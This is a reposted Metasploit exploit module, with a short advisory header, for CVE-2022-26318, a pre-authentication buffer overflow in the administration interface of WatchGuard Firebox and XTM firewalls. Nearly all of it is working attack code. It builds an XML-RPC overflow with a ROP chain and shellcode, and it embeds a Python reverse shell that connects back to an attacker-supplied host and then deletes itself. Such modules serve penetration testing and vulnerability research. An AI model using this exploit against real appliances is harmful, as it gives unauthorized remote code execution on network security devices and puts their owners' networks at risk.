Authored by Charles FOL, Dylan Pindur, h00die-gr3y, Misterxid | Site metasploit.com

This Metasploit module exploits a buffer overflow at the administration interface (8080 or 4117) of WatchGuard Firebox and XTM appliances which is built from a cherrypy python backend sending XML-RPC requests to a C binary called wgagent using pre-authentication endpoint /agent/login. This vulnerability impacts Fireware OS before 12.7.2_U2, 12.x before 12.1.3_U8, and 12.2.x through 12.5.x before 12.5.9_U2. Successful exploitation results in remote code execution as user nobody.

advisories | CVE-2022-26318

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'zlib'

class MetasploitModule < Msf::Exploit::Remote
  Rank = GoodRanking
  include Msf::Exploit::Remote::HttpClient
  prepend Msf::Exploit::Remote::AutoCheck

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'WatchGuard XTM Firebox Unauthenticated Remote Command Execution',
        'Description' => %q{
          This module exploits a buffer overflow at the administration interface (8080 or 4117) of WatchGuard Firebox
          and XTM appliances which is built from a cherrypy python backend sending XML-RPC requests to a C binary
          called wgagent using pre-authentication endpoint /agent/login.
          This vulnerability impacts Fireware OS before 12.7.2_U2, 12.x before 12.1.3_U8, and 12.2.x through 12.5.x
          before 12.5.9_U2. Successful exploitation results in remote code execution as user nobody.
        },
        'Author' => [
          'h00die-gr3y <h00die.gr3y[at]gmail.com>', # Metasploit module
          'Charles Fol (Ambionics Security)', # discovery
          'Dylan Pindur (AssetNote)', # reverse engineering of CVE-2022-26318'
          'Misterxid' # POC
        ],
        'References' => [
          [ 'CVE', '2022-26318' ],
          [ 'URL', 'https://www.ambionics.io/blog/hacking-watchguard-firewalls' ],
          [ 'URL', 'https://www.assetnote.io/resources/research/diving-deeper-into-watchguard-pre-auth-rce-cve-2022-26318' ],
          [ 'URL', 'https://github.com/misterxid/watchguard_cve-2022-26318' ],
          [ 'URL', 'https://attackerkb.com/topics/t8Nrnu99ZE/cve-2022-26318' ]
        ],
        'License' => MSF_LICENSE,
        'Platform' => [ 'unix' ],
        'Privileged' => false,
        'Arch' => [ ARCH_CMD ],
        'Targets' => [
          [
            'Automatic (Reverse Python Interactive Shell)',
            {
              'Platform' => [ 'unix' ],
              'Arch' => ARCH_CMD,
              'Type' => :unix_cmd,
              'DefaultOptions' => {
                'PAYLOAD' => 'cmd/unix/reverse_python',
                'SHELL' => '/usr/bin/python'
              }
            }
          ]
        ],
        'DefaultTarget' => 0,
        'DisclosureDate' => '2022-08-29',
        'DefaultOptions' => {
          'SSL' => true,
          'RPORT' => 8080
        },
        'Notes' => {
          'Stability' => [ SERVICE_RESOURCE_LOSS ],
          'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],
          'Reliability' => [ REPEATABLE_SESSION ]
        }
      )
    )
    register_options(
      [
        OptString.new('TARGETURI', [ true, 'WatchGuard Firebox base url', '/' ])
      ]
    )
  end

  def check_watchguard_firebox?
    res = send_request_cgi({
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path, 'auth', 'login'),
      'vars_get' => {
        'from_page' => '/'
      }
    })
    return true if res && res.code == 200 && res.body.include?('Powered by WatchGuard Technologies') && res.body.include?('Firebox')

    false
  end

  def create_bof_payload
    # temporary filename in /tmp where python payload will be stored.
    @py_fname = "/tmp/#{Rex::Text.rand_text_alphanumeric(4)}.py"
    # xml overflow payload
    payload = '<methodCall><methodName>agent.login</methodName><params><param><value><struct><member><value><'.encode
    payload << ('A' * 3181).encode
    payload << 'MFA>'.encode
    payload << ('<BBBBMFA>' * 3680).encode
    # padding and rop chain
    payload << "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
    payload << "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
    payload << "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
    payload << "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
    payload << "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
    payload << "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
    payload << "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
    payload << "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
    payload << "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00 P@x00x00"
    payload << "x00x00x00hxf9@x00x00x00x00x00 P@x00x00x00x00x00x00x00x0exd6Ax00x00x00x00x00xb1xd5A"
    payload << "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00}^@x00x00x00x00x00"
    payload << "x00x00x00x00x00x00x00x00|^@x00x00x00x00x00xadxd2Ax00x00x00x00x00x00x00x00x00x00"
    payload << "x00x00x00x0exd6Ax00x00x00x00x00xc0x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
    payload << "x00x00x00x00x00x00x00x00*xa9@x00x00x00x00x00Hx8d=x9dx00x00x00xbeAx02x00x00xbaxb6"
    payload << "x01x00x00xb8x02x00x00x00x0fx05Hx89x05x92x00x00x00Hx8bx15x93x00x00x00Hx8d5x94x00"
    payload << "x00x00Hx8b=}x00x00x00xb8x01x00x00x00x0fx05Hx8b=ox00x00x00xb8x03x00x00x00x0fx05xb8;"
    payload << "x00x00x00Hx8d=?x00x00x00Hx89= x00x00x00Hx8d5Ax00x00x00Hx895x1ax00x00x00Hx8d5x0bx00"
    payload << "x00x001xd2x0fx05xb8<x00x00x00x0fx05x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
    payload << "x00x00x00x00x00x00x00x00x00#{datastore['SHELL']}x00#{@py_fname}x00x00x00x00x00x00x00x00x00xef"
    payload << "x01x00x00x00x00x00x00"
    # shell code to launch an reverse interactive python shell
    # The Watchguard appliance has a very restricted linux command set, readonly root filesystem and no unix shells installed
    # The interactive Python shell (-i) is for now the only way to get shell access
    payload << 'import socket;from subprocess import call; from os import dup2;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);'.encode
    payload << "s.connect(("#{datastore['LHOST']}",#{datastore['LPORT']})); dup2(s.fileno(),0); dup2(s.fileno(),1); dup2(s.fileno(),2);".encode
    payload << "call(["#{datastore['SHELL']}","-i"]);".encode
    payload << "import os; os.remove("#{@py_fname}");".encode
    return Zlib.gzip(payload)
  end

  def check
    print_status("Checking if #{peer} can be exploited.")
    return CheckCode::Detected if check_watchguard_firebox?

    CheckCode::Safe
  end

  def exploit
    print_status("#{peer} - Attempting to exploit...")
    bof_payload = create_bof_payload
    print_status("#{peer} - Sending payload...")
    send_request_cgi({
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, 'agent', 'login'),
      'headers' => {
        'Accept-Encoding' => 'gzip, deflate',
        'Content-Encoding' => 'gzip'
      },
      'data' => bof_payload
    })
  end
end

RELATED ARTICLESMORE FROM AUTHOR